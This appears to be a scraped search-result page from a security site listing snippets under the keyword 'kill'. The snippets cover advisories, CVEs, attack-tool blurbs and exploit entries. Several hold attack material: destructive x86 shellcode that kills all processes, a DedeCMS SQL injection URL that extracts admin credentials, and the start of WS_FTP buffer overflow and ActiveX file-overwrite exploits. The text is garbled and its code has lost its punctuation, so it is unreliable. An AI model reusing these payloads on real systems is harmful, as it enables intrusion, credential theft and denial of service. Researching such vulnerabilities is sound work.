Kill Steve 2 - Dangerous filesystem permissions, WebView code execution vulnerabilities

HackApp vulnerability scanner discovered that application Kill Steve 2 published at the 'play' market has multiple vulnerabilities...

ziggystartux

ziggystartux A Kaiten rewrite, with much new functionality, an...

Kali Linux: Kill Chain

Kill Chain for Kali Linux 2.0 is a unified console with an anonymizer that will perform these stages of attacks: Reconnaissance Weaponization Delivery Exploit Installation Command & Control And Actions Dependencies: Tor — For the console build in anonymizer. Set — Social-Engineer Toolkit SET,...

Killchain - A Unified Console To Perform The "Kill Chain" Stages Of Attacks

“Kill Chain” is a unified console with an anonymizer that will perform these stages of attacks: Reconnaissance Weaponization Delivery Exploit Installation Command & Control And Actions Dependant tool sets are: 1 Tor -- For the console build in anonymizer. 2 Set -- Social-Engineer Toolkit SET,...

MS KB3118753: Update for ActiveX Kill Bits

The remote Windows host is missing one or more kill bits for ActiveX controls that are known to contain vulnerabilities. If any of these ActiveX controls are ever installed on the remote host, either now or in the future, they would expose the host to various security issues. Note that the affect...

USBkill - Anti-Forensic Kill-Switch that waits for a change on your USB ports

USBkill is an anti-forensic kill-switch that waits for a change on your USB ports and then immediately shuts down your computer. To run: sudo python usbkill.py Why? Some reasons to use this tool: In case the police or other thugs come busting in or steal your laptop from you when you are at a...

linux/x86 kill(-1, SIGKILL) - 10 bytes

// linux/x86 kill-1, SIGKILL - 10 bytes // Febriyanto Nugroho include char shellcode = "\x6a\x25" \ push $0x25 "\x58" \ pop %eax "\x6a\xff" \ push $0xffffffff = -1 "\x5b" \ pop %ebx "\xb1\x09" \ mov $0x9,%cl "\xcd\x80"; \ int $0x80 int mainint argc, char argv asm"jmp %0;" : "=m" shellcode;...

Slack Discloses Breach of its User Profile Database

Enterprise and small business collaboration provider Slack today disclosed that a database storing user profile information has been compromised. The company said in a notice posted on its site that the unauthorized access has been blocked, and that it has implemented two-factor authentication...

DedeCMS 2 0 1 4 0 2 0 1 before 5. 7 through kill-vulnerability warning-the black bar safety net

No need to register Membership account: Exp:plus/recommend. php? action=&aid=1&FILEStypetmpname=' or mid=@" /! 50000union//! 50000select/1,2,3,select CONCAT0x7c,userid,0x7c,pwd+from+%2 3@admin limit+0,1,5,6,7,8,9%2 3@"+&FILEStypename=1. jpg&FILEStype type=application/octet-stream&FILEStypesize=1...

Safari 8.0 Crash Proof Of Concept

@w3bd3vil svg padding-top: 1337%; box-sizing: border-box; 0x7fff8ab10282: jae 0x7fff8ab1028c ; pthreadkill + 20 0x7fff8ab10284: movq %rax, %rdi 0x7fff8ab10287: jmp 0x7fff8ab0bca3 ; cerrornocancel 0x7fff8ab1028c: retq lldb register read General Purpose Registers: rax = 0x0000000000000000 rbx =...

RHEL 5 : vdsm22 (RHSA-2010:0628)

The remote Redhat Enterprise Linux 5 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2010:0628 advisory. VDSM is a management module that serves as a Red Hat Enterprise Virtualization Manager agent on Red Hat Enterprise Virtualization Hypervisor or Red H...

CVE-2014-3684

CVE-2014-3684 affects the TORQUE Resource Manager (lib/Libifl/tm.c, tm_adopt) across 5.0.x, 4.5.x, 4.2.x and earlier. The root cause is that the owner of a process is not validated to also own the adopted session id, enabling remote authenticated users to kill arbitrary processes via a crafted ex...

CVE-2014-3684

The tmadopt function in lib/Libifl/tm.c in Terascale Open-Source Resource and Queue Manager aka TORQUE Resource Manager 5.0.x, 4.5.x, 4.2.x, and earlier does not validate that the owner of the process also owns the adopted session id, which allows remote authenticated users to kill arbitrary...

Debian DSA-3058-1 : torque - security update

Chad Vizino reported a vulnerability in torque, a PBS-derived batch processing queueing system. A non-root user could exploit the flaw in the tmadopt library call to kill any process, including root-owned ones on any node in a job. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. The...

[SECURITY] [DLA 78-1] torque security update

Package : torque Version : 2.4.8+dfsg-9squeeze5 CVE ID : CVE-2014-3684 Chad Vizino reported a vulnerability in torque, a PBS-derived batch processing queueing system. A non-root user could exploit the flaw in the tmadopt library call to kill any process, including root-owned ones on any node in a...

7 Things About Android Lollipop 5.0 You Need To Know

After offering chocolate Kit-Kat, now Google is ready to serve you Lollipops. Google on Wednesday finally revealed the official name of its next version Android L — Android 5.0 Lollipop. The newly released Android 5.0 Lollipop ships with the latest Motorola-made Nexus 6 smartphone and Nexus 9...

WS_FTP Server <= 5.03 (RNFR) Buffer Overflow Exploit

No description provided by source. ===== Start WSFTPOverflow.pl ===== Usage: WSFTPOverflow.pl ip ftp user ftp pass WSFTPOverflow.pl 127.0.0.1 hello moto WSFTP Server Version 5.03, 2004.10.14 Download: http://www.ipswitch.com/ use IO::Socket; use strict; my$socket = ; if $socket =...

KingView 6.53 - ActiveX Remote File Creation / Overwrite (KChartXY)

No description provided by source. !-- KingView ActiveX Control KChartXY Remote File Creation / Overwrite Vendor: http://www.wellintech.com Version: KingView 6.53 Tested on: Windows XP SP3 / IE Download: http://www.wellintech.com/documents/KingView6.53EN.zip Author: Blake CLSID:...

ManTrap 1.6.1 Hidden Process Disclosure Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/1908/info ManTrap is a honeypot intrusion detection system designed to lure attackers into it for analysis. The honeypot is implemented as a chroot'ed Solaris environment, designed to look and feel real to an attacker who...

PhpMyDesktop/Arcade 1.0 Final - (phpdns_basedir) RFI Vulnerability

No description provided by source. Name : PhpMyDesktop|arcade 1.0 Final phpdnsbasedir Remote File Include Download From : http://mesh.dl.sourceforge.net/sourceforge/pmd-arcade/pmdarcade10final.zip Found By : RoMaNcYxHaCkEr Home Page : Not Yet : Google Dork : Powered by phpMyDesktop|arcade v1.0...